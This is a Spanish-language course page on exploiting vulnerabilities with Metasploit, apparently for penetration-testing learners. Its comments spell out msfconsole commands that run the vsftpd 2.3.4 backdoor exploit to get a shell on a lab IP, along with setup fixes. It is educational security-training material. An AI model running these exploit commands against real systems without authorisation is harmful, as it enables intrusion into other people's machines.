A煤n no tienes acceso a esta clase

Crea una cuenta y contin煤a viendo este curso

Explotaci贸n de vulnerabilidades con Metasploit

24/33
Recursos

Metasploit es un framework para desarrollo y prueba de exploits que aprovecha diferentes vulnerabilidades. Utiliza una gran base de datos donde encuentras payloads y exploits que puedes usar dependiendo de las debilidades encontradas.

Aportes 11

Preguntas 1

Ordenar por:

驴Quieres ver m谩s aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesi贸n.

Comandos:

  • Iniciar por las dudas el servidor de base de datos: service postgresql start
  • Iniciar metasploit: msfconsole
  • Buscar exploits con search nombreexploit
  • Usar el exploit: use exploit/unix/ftp/vsftpd_234_backdoor`
  • Setear el target: set RHOST IP
  • Ejecutar el exploit: run

Para los que les salga este problemita

Exploit completed, but no session was created.

yo intent茅 con poner el payload correspondiente

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor 
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.20.34
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Y funcion贸

me parece necesaria una actualizacion del curso, ya lleva mas de dos a帽os, seria bueno que lo actualizaran

Wow! mi primer Hack! Exploit successful! shell found! 馃懇鈥嶐煔

yo tuve un problema de que no podia leer un archivo --bundler/ setup; Aqui les dejo la solucion

sudo gem update --system

sudo gem install bundler:1.17.3

continuan con

cd /usr/share/metasploit-framework

sudo bundle install

por ultimo damos el comando #msfconsole

actualicen el curso鈥ay comandos que se han modificado

Buenos d铆谩s, tengo una duda y queria saber quien me puede ayudar. No entiendo la diferencia de ejecutar el exploit con la palabra 鈥渞un鈥 y la palabra 鈥渆xploit鈥, lo pregunto porque tenia entendido que el 鈥渞un鈥 se usa para ejecutar un 鈥渁uxiliary鈥

Metasploit 鈥 software (framework) que sirve para ejecutar exploits aprovenchando diferentes vulnerabilidades.

Exploit 鈥 software que sirve para usar contra S.O. software o protocolo para poderlo usar de forma para la que no fue programada.

Y si no logramos tener un Shell, que hacemos?